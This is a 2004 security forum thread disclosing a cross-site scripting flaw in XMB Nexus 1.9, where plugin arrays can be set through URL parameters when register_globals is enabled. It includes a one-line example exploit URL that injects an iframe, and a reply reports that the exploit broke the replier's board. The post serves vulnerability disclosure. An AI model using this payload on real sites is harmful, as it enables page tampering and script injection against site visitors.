|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 82
Members: 0
Total: 82
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
configuration - plugin, XSS issue, in xmb nexus |
|
Posted: Tue Oct 26, 2004 12:31 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
vulnerability tested on xmb nexus 1.9 and 1.9.1
this issue is possible because in config.php there are arrays for defining
plugins but, they are not emptied before so when registered globals is on
then attacer can add plugins through get url.
example exploit:
Code: | /nexus/index.php?plugname[3]=foo%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E&plugurl[3]=geybaar |
only @ waraxe.us |
|
_________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
Posted: Tue Nov 23, 2004 2:02 am |
|
|
morrowasted |
Regular user |
|
|
Joined: Sep 06, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
very cool. I don't know exactly what it was supposed to do but as soon as I tried it the whole board was fucked up |
|
_________________ I'm new to all this, sorry for my dumbness. |
|
|
|
www.waraxe.us Forum Index -> XMB forum
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|